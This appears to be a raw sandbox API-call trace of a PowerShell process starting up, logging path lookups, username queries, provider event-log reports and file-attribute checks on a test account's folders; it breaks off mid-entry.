GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.244] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.244] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b825410, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.244] CoTaskMemFree (pv=0x1b825410) [0136.244] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.244] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.245] CoTaskMemFree (pv=0x14d180) [0136.245] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3675750*="Function", lpRawData=0x36754e0) returned 1 [0136.246] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.247] CoTaskMemFree (pv=0x10c990) [0136.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.293] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.293] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b825410, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.294] CoTaskMemFree (pv=0x1b825410) [0136.294] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.294] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.294] CoTaskMemFree (pv=0x14d180) [0136.296] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3697f58*="Registry", lpRawData=0x3697ce8) returned 1 [0136.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.302] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.302] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b825410, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.303] CoTaskMemFree (pv=0x1b825410) [0136.303] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.303] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.304] CoTaskMemFree (pv=0x14d180) [0136.305] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x369d350*="Variable", lpRawData=0x369d0e0) returned 1 [0136.310] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.310] CoTaskMemFree (pv=0x10c990) [0136.330] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.330] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.330] CoTaskMemFree (pv=0x10c990) [0136.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0136.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0136.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0136.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0136.388] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.388] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b825410, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.388] CoTaskMemFree (pv=0x1b825410) [0136.388] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.388] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.389] CoTaskMemFree (pv=0x14d180) [0136.389] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x36b0f48*="Certificate", lpRawData=0x36b0cd8) returned 1 [0136.395] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.395] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.395] CoTaskMemFree (pv=0x10c990) [0136.398] GetLogicalDrives () returned 0x4 [0136.398] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcd150, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.398] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.399] CoTaskMemAlloc (cb=0x20e) returned 0x15bfe0 [0136.399] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x15bfe0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop") returned 0x1f [0136.399] CoTaskMemFree (pv=0x15bfe0) [0136.401] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.401] CoTaskMemFree (pv=0x10c990) [0136.401] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.401] CoTaskMemFree (pv=0x10c990) [0136.412] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.412] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.412] CoTaskMemFree (pv=0x10c990) [0136.415] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.415] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.415] CoTaskMemFree (pv=0x10c990) [0136.416] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xcceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.416] SetErrorMode (uMode=0x1) returned 0x1 [0136.416] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.416] SetErrorMode (uMode=0x1) returned 0x1 [0136.416] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xcceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.416] SetErrorMode (uMode=0x1) returned 0x1 [0136.416] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.417] SetErrorMode (uMode=0x1) returned 0x1 [0136.417] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.417] CoTaskMemFree (pv=0x10c990) [0136.431] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xcd050, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.432] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.432] SetErrorMode (uMode=0x1) returned 0x1 [0136.432] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6a527350, ftLastAccessTime.dwHighDateTime=0x1d39bfa, ftLastWriteTime.dwLowDateTime=0x6a527350, ftLastWriteTime.dwHighDateTime=0x1d39bfa, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.432] SetErrorMode (uMode=0x1) returned 0x1 [0136.432] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.432] SetErrorMode (uMode=0x1) returned 0x1 [0136.432] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6a527350, ftLastAccessTime.dwHighDateTime=0x1d39bfa, ftLastWriteTime.dwLowDateTime=0x6a527350, ftLastWriteTime.dwHighDateTime=0x1d39bfa, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.432] SetErrorMode (uMode=0x1) returned 0x1 [0136.433] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.433] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.433] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.433] SetErrorMode (uMode=0x1) returned 0x1 [0136.433] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf068ee40, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf068ee40, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0136.433] SetErrorMode (uMode=0x1) returned 0x1 [0136.433] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.433] SetErrorMode (uMode=0x1) returned 0x1 [0136.433] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf068ee40, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf068ee40, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0136.434] SetErrorMode (uMode=0x1) returned 0x1 [0136.434] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.434] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.434] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.434] SetErrorMode (uMode=0x1) returned 0x1 [0136.434] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS" (normalized: "c:\\users\\adu0vk iwa5kls"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf068ee40, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0xf0dd91a0, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf0dd91a0, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.434] SetErrorMode (uMode=0x1) returned 0x1 [0136.434] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.434] SetErrorMode (uMode=0x1) returned 0x1 [0136.435] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS" (normalized: "c:\\users\\adu0vk iwa5kls"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf068ee40, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0xf0dd91a0, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf0dd91a0, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.435] SetErrorMode (uMode=0x1) returned 0x1 [0136.435] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.435] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\.", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.435] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.435] SetErrorMode (uMode=0x1) returned 0x1 [0136.435] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.435] SetErrorMode (uMode=0x1) returned 0x1 [0136.436] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.436] SetErrorMode (uMode=0x1) returned 0x1 [0136.436] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.436] SetErrorMode (uMode=0x1) returned 0x1 [0136.436] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.436] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop\\.", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.437] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.437] SetErrorMode (uMode=0x1) returned 0x1 [0136.437] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf068ee40, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf068ee40, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0136.437] SetErrorMode (uMode=0x1) returned 0x1 [0136.437] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.437] SetErrorMode (uMode=0x1) returned 0x1 [0136.437] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf068ee40, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf068ee40, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0136.437] SetErrorMode (uMode=0x1) returned 0x1 [0136.438] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.438] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xcce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.438] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.438] SetErrorMode (uMode=0x1) returned 0x1 [0136.438] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS" (normalized: "c:\\users\\adu0vk iwa5kls"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf068ee40, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0xf0dd91a0, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf0dd91a0, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.438] SetErrorMode (uMode=0x1) returned 0x1 [0136.438] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 